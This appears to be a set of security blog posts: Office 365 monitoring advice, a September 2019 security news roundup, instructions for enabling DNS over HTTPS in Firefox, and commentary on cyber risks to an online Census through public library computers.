Best Practices for Office 365 Monitoring

Logging, monitoring and alerting is probably the single biggest weakness that most organizations have.

Office 365 is also likely the single biggest vulnerability.

So what actions should you be monitoring in Office?

According to AT&T’s Alien Vault division, here is the answer.

  1.  User access – who is there normally; what is your user baseline.  Are you seeing more failed logins than normal?
  2. Administrator actions – a hacker will likely try to become an administrator, assuming the account they hacked doesn’t belong to an administrator already.  Any change in patterns could be a warning sign.
  3. Changes to Office policies –  if the attacker wants to get away with something would normally normally not be allowed, they will want to change the policy to let them do it.
  4. Current threat intelligence – use your threat intel sources such as the FBI, Secret Service, public alert feeds and others to tweak what you are alerting on based on attacks that the industry is currently seeing.

What are the details (see the link for even more detail)?

  • Logins – both success and failures including time and location
  • New users, deleted users, permission changes
  • Changes to logging rules
  • Access –  to Sharepoint,  One drive and other resources
  • Changes to Sharepoint and One drive permissions
  • Changes to O.365 policies including spam, DLP and other policies that might allow an attacker to get data out or malware in
  • Contact with known malicious IPs (see indicators of compromise from various alerts)
  • File uploads of file types known to be used in ransomware attacks (exfiltration of data)

You do need to review the alerts that you get in real time and that will take some resources, but you should be able to train lower level staff to perform first level triage.

This is not simple and it will take resources.  However, being hacked, having a breach or dealing with a ransomware attack is not free either.

Source: AT&T Alienvault

Security News for the Week Ending September 6, 2019

Cisco: Critical Bug Allows Remote Takeover of Routers

Cisco rated this bug 10 out of 10.  For users of Cisco 4000 series ISRs, ASR 1000 series aggregation routers, 1000v cloud routers and integrated services virtual routers, an unauthenticated user can gain full control just by sending a malicious HTTP request.  So yet another reminder that patching your network gear is critical.  For Cisco, that means having to purchase their maintenance agreement every year.  Source: Threatpost.

USBAnywhere – Especially Places You Don’t Want

Eclypsium announced a vulnerability in the Baseband Management Controller (BMC) in Supermicro motherboards that allow any attacker anywhere, without authorization, to access the BMC chipset and mount a virtual USB device, wreaking all kinds of havoc as you might imagine.  Like stealing your data, installing malware or even disabling the server entirely.  The researchers found 14,000 servers publicly exposed, which is a small number, but as soon as a hacker compromises a single user’s computer anywhere in the enterprise, public equals private – no difference.  Part of the problem is that almost no one knows who’s motherboard is inside their server.  The only good news, if there is any, is that Supermicro has released patches, but you have to figure out if your boards are vulnerable and patch them manually.  Isn’t that exciting?  Source: The Hacker News.

Remember When we Thought iPhones Were Secure?

Apparently that myth is beginning to get a little tarnished.  In fact, Android zero days are worth more than iPhone attacks.  Why?  Because, exploit broker Zerodium says, iPhone exploits, mostly based on Safari and iMessage, two core parts of the iPhone, are FLOODING the market.

I don’t think that users need to panic, but I think that they need to understand that iPhones are computers running software and software has bugs.  All software has bugs.  Practice safe computing, no matter what platform you are using.  Source: Vice.

Unencrypted Passwords from Poshmark Breach For Sale on the Dark Web

When Poshmark put up a information free notice last year that some user information had been hacked (turns out it was 36 million even though they didn’t say so), but that no financial information was taken, so they didn’t feel too bad about it, most people said, another day, another breach.

The 36 million accounts were for sale for $750 which means that even the hacker didn’t think they were valuable.  But now there are reports that one million of those accounts are available with the passwords decrypted, likely at a much higher price.  Does this mean they are working on the other 35 million?  Who knows but if you have a Poshmark account, you should definitely change that password and if the password was used elsewhere, change that too.  Source: Bleeping Computer .

Researchers Claim to Have Hacked the Secure Enclave

CPU makers have created what they call a “secure enclave” as a way to protect very sensitive information in the computer.  Intel calls their feature SGX.  Researchers claim to have created an attack based on Intel’s and AMD’s assumption that only non-malicious code would run in a secure enclave.  If this all proves out, it represents a real threat and reiterates the fact that you have to keep hackers out, because once they are in, nothing is safe.  Source: Bruce Schneier.

Securing DNS

Most people don’t know what DNS is, but it is almost as old as the Internet and you use it hundreds of times a day, probably thousands of times a day.

Every time you check for new email on your phone or browse to a web site, you are using DNS.  The Internet uses numeric addresses called IP addresses to route requests, but you use names like ESPN.Com, and  DNS is what translates to (IPv4) or 2a03:2880:f003:c07:face:b00c::2 (IPv6).

Virtually all of your communications on the Internet these days are encrypted.  Except for DNS.  That means that anyone listening on your connection can see what web sites you are visiting and, if they are  malicious, route you to an alternative, malicious site.  That is because DNS traffic is not encrypted.

Until now.

There was an experiment called DNSCrypt that encrypted your DNS traffic, but it required that you install and configure software.  It never gained any traction.

After that came (of course) two competing standards, one called DNS over TLS and the other called DNS over HTTPS.    It looks like DNS over HTTPS won.

It does require that you turn it on in your browser, but beyond that, nothing is required.  That will probably change in the future to be the default.

In England, the Internet Service Provider Association named Firefox and Google villains of the year for encrypting your DNS traffic and GCHQ (their version of NSA) wasn’t thrilled either.  Probably a great reason to do it all by itself.

Firefox is the first to do it.  In Firefox, it is a bit confusing, but here is a ZDNet article on how to do it.

1. Type about:preferences in the address bar

2. scroll down to network settings and click on settings

3. click on enable DNS over HTTPS

4. Click OK.

You can change the default provider, but you don’t have to.

That’s pretty simple.  That is all it takes.

Now all of your DNS requests are private and cannot be spoofed by your local coffee shop WiFi.

Chrome is a little behind, but it should be there in a couple of months and since Microsoft Edge is really Chrome with a different decal, it will likely show up there too.

Having someone listen in on your browsing is maybe a problem if you care about your privacy.

Having someone redirect your browser to a malicious version of the web site you want to go to and steal your password or install malware.  That is a legitimate problem.

One more security/privacy thing that you should enable and it doesn’t cost anything.


Will Hackers Compromise the Census by Attacking Library Computers?

The U.S. Census wants people to respond online because it will save them money.  They don’t have to transfer data from paper forms and they don’t have to send census workers out.  From a pure finance standpoint, it makes perfect sense.  The census will cost us about $15 billion this time around.

And, from a typical user’s standpoint, whether the census data is right or wrong won’t change the number of dollars in their pocket, so they don’t really care whether it is correct.  That is, of course, a short term perspective.

In fairness, the Census Bureau has been working with Homeland Security to try and protect the first ever digital census, but given the government’s general cybersecurity record, that doesn’t give me a whole lot of hope.

From our adversary’s perspective, destroying normal Americans’ confidence in the Census results would be a good thing.

The Census Bureau plans on telling the 66 million Americans who do not have Internet at home to go to a local public library (that sounds like an awful concept to me, but I understand that the Census Bureau wants to save money).

Consider, however, the track record of public libraries from a cybersecurity perspective.   In 2017 hackers successfully attacked 700 public libraries from St. Louis, to Anne Arundel County, MD. to South Carolina, New York and many others.

Library budgets are being slashed across the country, so cybersecurity is probably not their top priority, even if it means that the Census results may be invalid and subject to lawsuits.

The New York Library Association said that state libraries were unprepared for the Census.

Alaska cancelled funding for Internet access at it’s public libraries, so many of those libraries may not even be able to allow residents to complete their Census forms online at all.

If Russia and China decide that creating more chaos would be useful to them, increasing the level of attacks on libraries could happen during the Census filing season.

The Census Bureau, following the tradition that many businesses started years ago, has eliminated or reduced testing as their software is behind schedule.  Companies have figured out that was a bad idea, but not the Census Bureau.

For me, paper seems like a much safer idea.

And don’t be surprised if we see a lot of lawsuits.  Stock up on popcorn, this could get interesting.

Source: Wired.